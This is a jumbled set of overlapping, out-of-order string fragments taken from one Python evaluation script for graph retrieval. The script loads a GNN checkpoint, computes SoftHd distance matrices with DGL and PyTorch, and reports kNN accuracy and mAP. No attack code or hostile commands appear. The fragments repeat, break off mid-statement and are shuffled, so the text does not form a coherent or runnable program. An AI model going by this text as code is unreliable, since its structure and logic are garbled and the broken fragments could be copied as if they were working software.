print('Parameters:\\t'", "& Optimizer') if args.loss=='triplet': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap) elif args.loss=='triplet_distance': args.triplet=True criterion", "net, distNet = net.cuda(), distNet.cuda() criterion = criterion.cuda() start_epoch = 0 best_map =", "target_gallery = np.array(np.concatenate(target_gallery)) gdata = list(map(lambda g: g.gdata['std'], g_gallery)) g_gallery = dgl.batch(g_gallery) g_gallery.gdata", "TripletLoss import dgl __author__ = \"<NAME>\" __email__ = \"<EMAIL>\" def test(data_loader, gallery_loader, nets,", "import glob import numpy as np import time import os # Own modules", "= criterion.cuda() start_epoch = 0 best_map = 0 early_stop_counter = 0 if args.load", "<gh_stars>1-10 # -*- coding: utf-8 -*- from __future__ import print_function, division \"\"\" Graph", "gdata = list(map(lambda g: g.gdata['std'], g_gallery)) g_gallery = dgl.batch(g_gallery) g_gallery.gdata = {'std': torch.cat(gdata)}", "Data Parallel **NOT TESTED**') net = torch.nn.DataParallel(net, device_ids=list(range(args.ngpu))) if args.cuda: print('\\t* CUDA') net,", "\"<EMAIL>\" def test(data_loader, gallery_loader, nets, cuda, validation=False): batch_time = LogMetric.AverageMeter() acc = LogMetric.AverageMeter()", "LogMetric from utils import load_checkpoint, knn_accuracy, mean_average_precision from models import models, distance from", "batch_time = LogMetric.AverageMeter() acc = LogMetric.AverageMeter() meanap = LogMetric.AverageMeter() net, distance = nets", "def main(): print('Loss & Optimizer') if args.loss=='triplet': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap) elif", "torch import glob import numpy as np import time import os # Own", "valid_loader, valid_gallery_loader, test_loader, test_gallery_loader, in_size = load_data(args.dataset, args.data_path, triplet=args.triplet, batch_size=args.batch_size, prefetch=args.prefetch) print('Create model')", "and args.ngpu > 1: 
print('\\t* Data Parallel **NOT TESTED**') net = torch.nn.DataParallel(net, device_ids=list(range(args.ngpu)))", "target_combined_query = np.unique(target_query) combined_dist_matrix = torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1]) for i, kw in enumerate(target_combined_query): ind", "torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1]) for i, kw in enumerate(target_combined_query): ind = kw == target_query combined_dist_matrix[i]", "time import os # Own modules from options import Options from Logger import", "np.unique(target_query) combined_dist_matrix = torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1]) for i, kw in enumerate(target_combined_query): ind = kw", "combine mAP {}'.format(mean_average_precision(dist_matrix, target_gallery, target_query))) target_combined_query = np.unique(target_query) combined_dist_matrix = torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1]) for", "[] for i, (g, target) in enumerate(data_loader): # Prepare input data if cuda:", "target_gallery, target_combined_query)) batch_time.update(time.time()-start) print('* Test Acc {acc.avg:.3f}; mAP {meanap.avg: .5f} Time x Test", "= dist_matrix else: print('* Test No combine mAP {}'.format(mean_average_precision(dist_matrix, target_gallery, target_query))) target_combined_query =", "import load_data from loss.contrastive import ContrastiveLoss, TripletLoss import dgl __author__ = \"<NAME>\" __email__", "cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g) target_gallery.append(target) g_gallery.append(g) target_gallery", "print('Loaded model at epoch {epoch} and mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***') test(test_loader, test_gallery_loader, [net, distNet],", "= torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1]) for i, kw in enumerate(target_combined_query): ind = kw == target_query", "args.out_size, 
nlayers=args.nlayers, hid=args.hidden, J=args.pow) distNet = distance.SoftHd() print('Check CUDA') if args.cuda and args.ngpu", "model') checkpoint = load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch = checkpoint['epoch'] best_map = checkpoint['best_map'] print('Loaded", "in enumerate(target_combined_query): ind = kw == target_query combined_dist_matrix[i] = dist_matrix[ind].min(0).values # K-NN classifier", "-*- from __future__ import print_function, division \"\"\" Graph classification \"\"\" # Python modules", "as np import time import os # Own modules from options import Options", "models import models, distance from data.load_data import load_data from loss.contrastive import ContrastiveLoss, TripletLoss", "+ str(args)) # Check cuda & Set random seed args.cuda = args.ngpu >", "distance(g, g_gallery, mode='retrieval') dist_matrix.append(d) target_query.append(target) dist_matrix = torch.stack(dist_matrix) target_query = np.array(np.concatenate(target_query)) if validation:", "cuda & Set random seed args.cuda = args.ngpu > 0 and torch.cuda.is_available() np.random.seed(args.seed)", "from data.load_data import load_data from loss.contrastive import ContrastiveLoss, TripletLoss import dgl __author__ =", "Test No combine mAP {}'.format(mean_average_precision(dist_matrix, target_gallery, target_query))) target_combined_query = np.unique(target_query) combined_dist_matrix = torch.zeros(target_combined_query.shape[0],", "test_loader, test_gallery_loader, in_size = load_data(args.dataset, args.data_path, triplet=args.triplet, batch_size=args.batch_size, prefetch=args.prefetch) print('Create model') net =", "not None: print('Loading model') checkpoint = load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch = checkpoint['epoch'] best_map", "random seed args.cuda = args.ngpu > 0 and 
torch.cuda.is_available() np.random.seed(args.seed) torch.manual_seed(args.seed) if args.cuda:", "target_query))) target_combined_query = np.unique(target_query) combined_dist_matrix = torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1]) for i, kw in enumerate(target_combined_query):", "test_gallery_loader, in_size = load_data(args.dataset, args.data_path, triplet=args.triplet, batch_size=args.batch_size, prefetch=args.prefetch) print('Create model') net = models.GNN(in_size,", "g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g) target_gallery.append(target) g_gallery.append(g) target_gallery =", ".format(acc=acc, meanap=meanap, b_time=batch_time)) return acc, meanap def main(): print('Loss & Optimizer') if args.loss=='triplet':", "CUDA') if args.cuda and args.ngpu > 1: print('\\t* Data Parallel **NOT TESTED**') net", "args.loss=='triplet_distance': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap, dist=True) else: args.triplet=False criterion = ContrastiveLoss(margin=args.margin) print('Prepare", "best_map = 0 early_stop_counter = 0 if args.load is not None: print('Loading model')", "[net, distNet], args.cuda) if __name__ == '__main__': # Parse options args = Options().parse()", "print('* Test Acc {acc.avg:.3f}; mAP {meanap.avg: .5f} Time x Test {b_time.avg:.3f}' .format(acc=acc, meanap=meanap,", "distance.eval() end = time.time() dist_matrix = [] start = time.time() with torch.no_grad(): g_gallery", "acc.update(knn_accuracy(combined_dist_matrix, target_gallery, target_combined_query, k=5)) # mAP retrieval meanap.update(mean_average_precision(combined_dist_matrix, target_gallery, target_combined_query)) batch_time.update(time.time()-start) print('* Test", "Test and Load if args.load is None: raise Exception('Cannot test without loading a", "options import Options from Logger import LogMetric from utils import load_checkpoint, knn_accuracy, mean_average_precision", "args.load is not None: 
print('Loading model') checkpoint = load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch =", "K-NN classifier acc.update(knn_accuracy(combined_dist_matrix, target_gallery, target_combined_query, k=5)) # mAP retrieval meanap.update(mean_average_precision(combined_dist_matrix, target_gallery, target_combined_query)) batch_time.update(time.time()-start)", "[] start = time.time() with torch.no_grad(): g_gallery = [] target_gallery = [] for", "dgl __author__ = \"<NAME>\" __email__ = \"<EMAIL>\" def test(data_loader, gallery_loader, nets, cuda, validation=False):", "g.gdata['std'].cuda() # Output g = net(g) d = distance(g, g_gallery, mode='retrieval') dist_matrix.append(d) target_query.append(target)", "= net(g) d = distance(g, g_gallery, mode='retrieval') dist_matrix.append(d) target_query.append(target) dist_matrix = torch.stack(dist_matrix) target_query", "for i, kw in enumerate(target_combined_query): ind = kw == target_query combined_dist_matrix[i] = dist_matrix[ind].min(0).values", "print('Check CUDA') if args.cuda and args.ngpu > 1: print('\\t* Data Parallel **NOT TESTED**')", "d = distance(g, g_gallery, mode='retrieval') dist_matrix.append(d) target_query.append(target) dist_matrix = torch.stack(dist_matrix) target_query = np.array(np.concatenate(target_query))", "time.time() with torch.no_grad(): g_gallery = [] target_gallery = [] for j, (g, target)", "meanap def main(): print('Loss & Optimizer') if args.loss=='triplet': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap)", "acc = LogMetric.AverageMeter() meanap = LogMetric.AverageMeter() net, distance = nets # switch to", "dist=True) else: args.triplet=False criterion = ContrastiveLoss(margin=args.margin) print('Prepare data') train_loader, valid_loader, valid_gallery_loader, test_loader, test_gallery_loader,", "combined_dist_matrix = torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1]) 
for i, kw in enumerate(target_combined_query): ind = kw ==", "Python modules import torch import glob import numpy as np import time import", "J=args.pow) distNet = distance.SoftHd() print('Check CUDA') if args.cuda and args.ngpu > 1: print('\\t*", "cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g) d = distance(g,", "**NOT TESTED**') net = torch.nn.DataParallel(net, device_ids=list(range(args.ngpu))) if args.cuda: print('\\t* CUDA') net, distNet =", "cuda, validation=False): batch_time = LogMetric.AverageMeter() acc = LogMetric.AverageMeter() meanap = LogMetric.AverageMeter() net, distance", "elif args.loss=='triplet_distance': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap, dist=True) else: args.triplet=False criterion = ContrastiveLoss(margin=args.margin)", "validation: target_combined_query = target_query combined_dist_matrix = dist_matrix else: print('* Test No combine mAP", "from options import Options from Logger import LogMetric from utils import load_checkpoint, knn_accuracy,", "Output g = net(g) d = distance(g, g_gallery, mode='retrieval') dist_matrix.append(d) target_query.append(target) dist_matrix =", "torch.stack(dist_matrix) target_query = np.array(np.concatenate(target_query)) if validation: target_combined_query = target_query combined_dist_matrix = dist_matrix else:", "if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g) target_gallery.append(target) g_gallery.append(g)", "Check cuda & Set random seed args.cuda = args.ngpu > 0 and torch.cuda.is_available()", "\"<NAME>\" __email__ = \"<EMAIL>\" def test(data_loader, gallery_loader, nets, cuda, validation=False): batch_time = LogMetric.AverageMeter()", "# Python modules import torch import glob import numpy as np import time", "Test Acc {acc.avg:.3f}; mAP {meanap.avg: .5f} Time x Test {b_time.avg:.3f}' .format(acc=acc, meanap=meanap, b_time=batch_time))", "dist_matrix[ind].min(0).values # 
K-NN classifier acc.update(knn_accuracy(combined_dist_matrix, target_gallery, target_combined_query, k=5)) # mAP retrieval meanap.update(mean_average_precision(combined_dist_matrix, target_gallery,", "target_query = [] for i, (g, target) in enumerate(data_loader): # Prepare input data", "distance from data.load_data import load_data from loss.contrastive import ContrastiveLoss, TripletLoss import dgl __author__", "target_query combined_dist_matrix[i] = dist_matrix[ind].min(0).values # K-NN classifier acc.update(knn_accuracy(combined_dist_matrix, target_gallery, target_combined_query, k=5)) # mAP", "data.load_data import load_data from loss.contrastive import ContrastiveLoss, TripletLoss import dgl __author__ = \"<NAME>\"", "to test mode net.eval() distance.eval() end = time.time() dist_matrix = [] start =", "args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap, dist=True) else: args.triplet=False criterion = ContrastiveLoss(margin=args.margin) print('Prepare data')", "distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch = checkpoint['epoch'] best_map = checkpoint['best_map'] print('Loaded model at epoch {epoch} and", "models.GNN(in_size, args.out_size, nlayers=args.nlayers, hid=args.hidden, J=args.pow) distNet = distance.SoftHd() print('Check CUDA') if args.cuda and", "> 0 and torch.cuda.is_available() np.random.seed(args.seed) torch.manual_seed(args.seed) if args.cuda: torch.cuda.manual_seed(args.seed) # Check Test and", "{}'.format(mean_average_precision(dist_matrix, target_gallery, target_query))) target_combined_query = np.unique(target_query) combined_dist_matrix = torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1]) for i, kw", "model') net = models.GNN(in_size, args.out_size, nlayers=args.nlayers, hid=args.hidden, J=args.pow) distNet = distance.SoftHd() print('Check CUDA')", "Options from Logger import LogMetric from utils import load_checkpoint, knn_accuracy, mean_average_precision from models", "criterion 
= TripletLoss(margin=args.margin, swap=args.swap) elif args.loss=='triplet_distance': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap, dist=True) else:", "Test {b_time.avg:.3f}' .format(acc=acc, meanap=meanap, b_time=batch_time)) return acc, meanap def main(): print('Loss & Optimizer')", "start = time.time() with torch.no_grad(): g_gallery = [] target_gallery = [] for j,", "# Check Test and Load if args.load is None: raise Exception('Cannot test without", "dgl.batch(g_gallery) g_gallery.gdata = {'std': torch.cat(gdata)} target_query = [] for i, (g, target) in", "main(): print('Loss & Optimizer') if args.loss=='triplet': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap) elif args.loss=='triplet_distance':", "input data if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g)", "= torch.stack(dist_matrix) target_query = np.array(np.concatenate(target_query)) if validation: target_combined_query = target_query combined_dist_matrix = dist_matrix", "return acc, meanap def main(): print('Loss & Optimizer') if args.loss=='triplet': args.triplet=True criterion =", "= TripletLoss(margin=args.margin, swap=args.swap, dist=True) else: args.triplet=False criterion = ContrastiveLoss(margin=args.margin) print('Prepare data') train_loader, valid_loader,", "test(test_loader, test_gallery_loader, [net, distNet], args.cuda) if __name__ == '__main__': # Parse options args", "LogMetric.AverageMeter() meanap = LogMetric.AverageMeter() net, distance = nets # switch to test mode", "utf-8 -*- from __future__ import print_function, division \"\"\" Graph classification \"\"\" # Python", "nets # switch to test mode net.eval() distance.eval() end = time.time() dist_matrix =", "target_combined_query, k=5)) # mAP retrieval meanap.update(mean_average_precision(combined_dist_matrix, target_gallery, target_combined_query)) batch_time.update(time.time()-start) print('* Test Acc {acc.avg:.3f};", "= 
torch.nn.DataParallel(net, device_ids=list(range(args.ngpu))) if args.cuda: print('\\t* CUDA') net, distNet = net.cuda(), distNet.cuda() criterion", "LogMetric.AverageMeter() acc = LogMetric.AverageMeter() meanap = LogMetric.AverageMeter() net, distance = nets # switch", "1: print('\\t* Data Parallel **NOT TESTED**') net = torch.nn.DataParallel(net, device_ids=list(range(args.ngpu))) if args.cuda: print('\\t*", "args.cuda and args.ngpu > 1: print('\\t* Data Parallel **NOT TESTED**') net = torch.nn.DataParallel(net,", "data') train_loader, valid_loader, valid_gallery_loader, test_loader, test_gallery_loader, in_size = load_data(args.dataset, args.data_path, triplet=args.triplet, batch_size=args.batch_size, prefetch=args.prefetch)", "if args.cuda: print('\\t* CUDA') net, distNet = net.cuda(), distNet.cuda() criterion = criterion.cuda() start_epoch", "Parallel **NOT TESTED**') net = torch.nn.DataParallel(net, device_ids=list(range(args.ngpu))) if args.cuda: print('\\t* CUDA') net, distNet", "= distance.SoftHd() print('Check CUDA') if args.cuda and args.ngpu > 1: print('\\t* Data Parallel", "test(data_loader, gallery_loader, nets, cuda, validation=False): batch_time = LogMetric.AverageMeter() acc = LogMetric.AverageMeter() meanap =", "prefetch=args.prefetch) print('Create model') net = models.GNN(in_size, args.out_size, nlayers=args.nlayers, hid=args.hidden, J=args.pow) distNet = distance.SoftHd()", "= [] target_gallery = [] for j, (g, target) in enumerate(gallery_loader): if cuda:", "data if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g) d", "torch.cuda.is_available() np.random.seed(args.seed) torch.manual_seed(args.seed) if args.cuda: torch.cuda.manual_seed(args.seed) # Check Test and Load if args.load", "classifier acc.update(knn_accuracy(combined_dist_matrix, target_gallery, target_combined_query, k=5)) # mAP retrieval meanap.update(mean_average_precision(combined_dist_matrix, target_gallery, target_combined_query)) 
batch_time.update(time.time()-start) print('*", "# K-NN classifier acc.update(knn_accuracy(combined_dist_matrix, target_gallery, target_combined_query, k=5)) # mAP retrieval meanap.update(mean_average_precision(combined_dist_matrix, target_gallery, target_combined_query))", "utils import load_checkpoint, knn_accuracy, mean_average_precision from models import models, distance from data.load_data import", "seed args.cuda = args.ngpu > 0 and torch.cuda.is_available() np.random.seed(args.seed) torch.manual_seed(args.seed) if args.cuda: torch.cuda.manual_seed(args.seed)", "> 1: print('\\t* Data Parallel **NOT TESTED**') net = torch.nn.DataParallel(net, device_ids=list(range(args.ngpu))) if args.cuda:", "and Load if args.load is None: raise Exception('Cannot test without loading a model.')", "checkpoint['epoch'] best_map = checkpoint['best_map'] print('Loaded model at epoch {epoch} and mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***')", "np import time import os # Own modules from options import Options from", "dist_matrix = torch.stack(dist_matrix) target_query = np.array(np.concatenate(target_query)) if validation: target_combined_query = target_query combined_dist_matrix =", "import print_function, division \"\"\" Graph classification \"\"\" # Python modules import torch import", "Options().parse() print('Parameters:\\t' + str(args)) # Check cuda & Set random seed args.cuda =", "CUDA') net, distNet = net.cuda(), distNet.cuda() criterion = criterion.cuda() start_epoch = 0 best_map", "args.data_path, triplet=args.triplet, batch_size=args.batch_size, prefetch=args.prefetch) print('Create model') net = models.GNN(in_size, args.out_size, nlayers=args.nlayers, hid=args.hidden, J=args.pow)", "import time import os # Own modules from options import Options from Logger", "import os # Own modules from options import Options from Logger import LogMetric", "[] target_gallery = [] for j, (g, target) in enumerate(gallery_loader): 
if cuda: g.to(torch.device('cuda'))", "g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g) d = distance(g, g_gallery, mode='retrieval')", "model at epoch {epoch} and mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***') test(test_loader, test_gallery_loader, [net, distNet], args.cuda)", "distance.SoftHd() print('Check CUDA') if args.cuda and args.ngpu > 1: print('\\t* Data Parallel **NOT", "-*- coding: utf-8 -*- from __future__ import print_function, division \"\"\" Graph classification \"\"\"", "# Parse options args = Options().parse() print('Parameters:\\t' + str(args)) # Check cuda &", "mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***') test(test_loader, test_gallery_loader, [net, distNet], args.cuda) if __name__ == '__main__': #", "distNet.cuda() criterion = criterion.cuda() start_epoch = 0 best_map = 0 early_stop_counter = 0", "glob import numpy as np import time import os # Own modules from", "= time.time() dist_matrix = [] start = time.time() with torch.no_grad(): g_gallery = []", "target) in enumerate(gallery_loader): if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g =", "0 if args.load is not None: print('Loading model') checkpoint = load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist'])", "meanap=meanap, b_time=batch_time)) return acc, meanap def main(): print('Loss & Optimizer') if args.loss=='triplet': args.triplet=True", "Parse options args = Options().parse() print('Parameters:\\t' + str(args)) # Check cuda & Set", "kw == target_query combined_dist_matrix[i] = dist_matrix[ind].min(0).values # K-NN classifier acc.update(knn_accuracy(combined_dist_matrix, target_gallery, target_combined_query, k=5))", "= np.array(np.concatenate(target_gallery)) gdata = list(map(lambda g: g.gdata['std'], g_gallery)) g_gallery = dgl.batch(g_gallery) g_gallery.gdata 
=", "batch_size=args.batch_size, prefetch=args.prefetch) print('Create model') net = models.GNN(in_size, args.out_size, nlayers=args.nlayers, hid=args.hidden, J=args.pow) distNet =", "g.gdata['std'].cuda() # Output g = net(g) target_gallery.append(target) g_gallery.append(g) target_gallery = np.array(np.concatenate(target_gallery)) gdata =", "args.cuda: print('\\t* CUDA') net, distNet = net.cuda(), distNet.cuda() criterion = criterion.cuda() start_epoch =", "# Output g = net(g) target_gallery.append(target) g_gallery.append(g) target_gallery = np.array(np.concatenate(target_gallery)) gdata = list(map(lambda", "enumerate(gallery_loader): if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g) target_gallery.append(target)", "'__main__': # Parse options args = Options().parse() print('Parameters:\\t' + str(args)) # Check cuda", "\"\"\" Graph classification \"\"\" # Python modules import torch import glob import numpy", "__future__ import print_function, division \"\"\" Graph classification \"\"\" # Python modules import torch", "with torch.no_grad(): g_gallery = [] target_gallery = [] for j, (g, target) in", "coding: utf-8 -*- from __future__ import print_function, division \"\"\" Graph classification \"\"\" #", "{acc.avg:.3f}; mAP {meanap.avg: .5f} Time x Test {b_time.avg:.3f}' .format(acc=acc, meanap=meanap, b_time=batch_time)) return acc,", "epoch {epoch} and mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***') test(test_loader, test_gallery_loader, [net, distNet], args.cuda) if __name__", "# -*- coding: utf-8 -*- from __future__ import print_function, division \"\"\" Graph classification", "import numpy as np import time import os # Own modules from options", "if args.loss=='triplet': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap) elif args.loss=='triplet_distance': args.triplet=True criterion = TripletLoss(margin=args.margin,", "= 
np.unique(target_query) combined_dist_matrix = torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1]) for i, kw in enumerate(target_combined_query): ind =", "= [] start = time.time() with torch.no_grad(): g_gallery = [] target_gallery = []", "dist_matrix = [] start = time.time() with torch.no_grad(): g_gallery = [] target_gallery =", "= \"<EMAIL>\" def test(data_loader, gallery_loader, nets, cuda, validation=False): batch_time = LogMetric.AverageMeter() acc =", "load_data(args.dataset, args.data_path, triplet=args.triplet, batch_size=args.batch_size, prefetch=args.prefetch) print('Create model') net = models.GNN(in_size, args.out_size, nlayers=args.nlayers, hid=args.hidden,", "in_size = load_data(args.dataset, args.data_path, triplet=args.triplet, batch_size=args.batch_size, prefetch=args.prefetch) print('Create model') net = models.GNN(in_size, args.out_size,", "else: args.triplet=False criterion = ContrastiveLoss(margin=args.margin) print('Prepare data') train_loader, valid_loader, valid_gallery_loader, test_loader, test_gallery_loader, in_size", "args.cuda) if __name__ == '__main__': # Parse options args = Options().parse() print('Parameters:\\t' +", "Output g = net(g) target_gallery.append(target) g_gallery.append(g) target_gallery = np.array(np.concatenate(target_gallery)) gdata = list(map(lambda g:", "= LogMetric.AverageMeter() meanap = LogMetric.AverageMeter() net, distance = nets # switch to test", "best_map = checkpoint['best_map'] print('Loaded model at epoch {epoch} and mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***') test(test_loader,", "train_loader, valid_loader, valid_gallery_loader, test_loader, test_gallery_loader, in_size = load_data(args.dataset, args.data_path, triplet=args.triplet, batch_size=args.batch_size, prefetch=args.prefetch) print('Create", "g_gallery = [] target_gallery = [] for j, (g, target) in enumerate(gallery_loader): if", "(g, target) in enumerate(gallery_loader): if 
cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g", "{meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***') test(test_loader, test_gallery_loader, [net, distNet], args.cuda) if __name__ == '__main__': # Parse", "b_time=batch_time)) return acc, meanap def main(): print('Loss & Optimizer') if args.loss=='triplet': args.triplet=True criterion", "{'std': torch.cat(gdata)} target_query = [] for i, (g, target) in enumerate(data_loader): # Prepare", "knn_accuracy, mean_average_precision from models import models, distance from data.load_data import load_data from loss.contrastive", "classification \"\"\" # Python modules import torch import glob import numpy as np", "start_epoch = checkpoint['epoch'] best_map = checkpoint['best_map'] print('Loaded model at epoch {epoch} and mAP", "0 and torch.cuda.is_available() np.random.seed(args.seed) torch.manual_seed(args.seed) if args.cuda: torch.cuda.manual_seed(args.seed) # Check Test and Load", "torch.nn.DataParallel(net, device_ids=list(range(args.ngpu))) if args.cuda: print('\\t* CUDA') net, distNet = net.cuda(), distNet.cuda() criterion =", "print('Loading model') checkpoint = load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch = checkpoint['epoch'] best_map = checkpoint['best_map']", "target_gallery = [] for j, (g, target) in enumerate(gallery_loader): if cuda: g.to(torch.device('cuda')) g.gdata['std']", "in enumerate(gallery_loader): if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g)", "Time x Test {b_time.avg:.3f}' .format(acc=acc, meanap=meanap, b_time=batch_time)) return acc, meanap def main(): print('Loss", "__email__ = \"<EMAIL>\" def test(data_loader, gallery_loader, nets, cuda, validation=False): batch_time = LogMetric.AverageMeter() acc", "net = torch.nn.DataParallel(net, device_ids=list(range(args.ngpu))) if 
args.cuda: print('\\t* CUDA') net, distNet = net.cuda(), distNet.cuda()", "switch to test mode net.eval() distance.eval() end = time.time() dist_matrix = [] start", "modules from options import Options from Logger import LogMetric from utils import load_checkpoint,", "nlayers=args.nlayers, hid=args.hidden, J=args.pow) distNet = distance.SoftHd() print('Check CUDA') if args.cuda and args.ngpu >", "= [] for i, (g, target) in enumerate(data_loader): # Prepare input data if", "checkpoint = load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch = checkpoint['epoch'] best_map = checkpoint['best_map'] print('Loaded model", "j, (g, target) in enumerate(gallery_loader): if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output", "start_epoch = 0 best_map = 0 early_stop_counter = 0 if args.load is not", "# Prepare input data if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g", "in enumerate(data_loader): # Prepare input data if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() #", "print('Create model') net = models.GNN(in_size, args.out_size, nlayers=args.nlayers, hid=args.hidden, J=args.pow) distNet = distance.SoftHd() print('Check", "for i, (g, target) in enumerate(data_loader): # Prepare input data if cuda: g.to(torch.device('cuda'))", "\"\"\" # Python modules import torch import glob import numpy as np import", "swap=args.swap) elif args.loss=='triplet_distance': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap, dist=True) else: args.triplet=False criterion =", "distNet = distance.SoftHd() print('Check CUDA') if args.cuda and args.ngpu > 1: print('\\t* Data", "args.triplet=False criterion = ContrastiveLoss(margin=args.margin) print('Prepare data') train_loader, valid_loader, valid_gallery_loader, test_loader, test_gallery_loader, in_size =", "g.to(torch.device('cuda')) 
g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g) d = distance(g, g_gallery,", "import load_checkpoint, knn_accuracy, mean_average_precision from models import models, distance from data.load_data import load_data", "combined_dist_matrix = dist_matrix else: print('* Test No combine mAP {}'.format(mean_average_precision(dist_matrix, target_gallery, target_query))) target_combined_query", "= time.time() with torch.no_grad(): g_gallery = [] target_gallery = [] for j, (g,", "= 0 best_map = 0 early_stop_counter = 0 if args.load is not None:", "Load if args.load is None: raise Exception('Cannot test without loading a model.') main()", "Optimizer') if args.loss=='triplet': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap) elif args.loss=='triplet_distance': args.triplet=True criterion =", "mAP {}'.format(mean_average_precision(dist_matrix, target_gallery, target_query))) target_combined_query = np.unique(target_query) combined_dist_matrix = torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1]) for i,", "= ContrastiveLoss(margin=args.margin) print('Prepare data') train_loader, valid_loader, valid_gallery_loader, test_loader, test_gallery_loader, in_size = load_data(args.dataset, args.data_path,", "ContrastiveLoss(margin=args.margin) print('Prepare data') train_loader, valid_loader, valid_gallery_loader, test_loader, test_gallery_loader, in_size = load_data(args.dataset, args.data_path, triplet=args.triplet,", "np.array(np.concatenate(target_query)) if validation: target_combined_query = target_query combined_dist_matrix = dist_matrix else: print('* Test No", "criterion = ContrastiveLoss(margin=args.margin) print('Prepare data') train_loader, valid_loader, valid_gallery_loader, test_loader, test_gallery_loader, in_size = load_data(args.dataset,", "import models, distance from data.load_data import load_data from loss.contrastive import ContrastiveLoss, TripletLoss import", "import dgl __author__ = \"<NAME>\" __email__ = 
\"<EMAIL>\" def test(data_loader, gallery_loader, nets, cuda,", "{meanap.avg: .5f} Time x Test {b_time.avg:.3f}' .format(acc=acc, meanap=meanap, b_time=batch_time)) return acc, meanap def", "swap=args.swap, dist=True) else: args.triplet=False criterion = ContrastiveLoss(margin=args.margin) print('Prepare data') train_loader, valid_loader, valid_gallery_loader, test_loader,", "= load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch = checkpoint['epoch'] best_map = checkpoint['best_map'] print('Loaded model at", "options args = Options().parse() print('Parameters:\\t' + str(args)) # Check cuda & Set random", "criterion = TripletLoss(margin=args.margin, swap=args.swap, dist=True) else: args.triplet=False criterion = ContrastiveLoss(margin=args.margin) print('Prepare data') train_loader,", "= kw == target_query combined_dist_matrix[i] = dist_matrix[ind].min(0).values # K-NN classifier acc.update(knn_accuracy(combined_dist_matrix, target_gallery, target_combined_query,", "args.ngpu > 0 and torch.cuda.is_available() np.random.seed(args.seed) torch.manual_seed(args.seed) if args.cuda: torch.cuda.manual_seed(args.seed) # Check Test", "args.loss=='triplet': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap) elif args.loss=='triplet_distance': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap,", "meanap.update(mean_average_precision(combined_dist_matrix, target_gallery, target_combined_query)) batch_time.update(time.time()-start) print('* Test Acc {acc.avg:.3f}; mAP {meanap.avg: .5f} Time x", "ind = kw == target_query combined_dist_matrix[i] = dist_matrix[ind].min(0).values # K-NN classifier acc.update(knn_accuracy(combined_dist_matrix, target_gallery,", "__name__ == '__main__': # Parse options args = Options().parse() print('Parameters:\\t' + str(args)) #", "enumerate(target_combined_query): ind = kw == target_query 
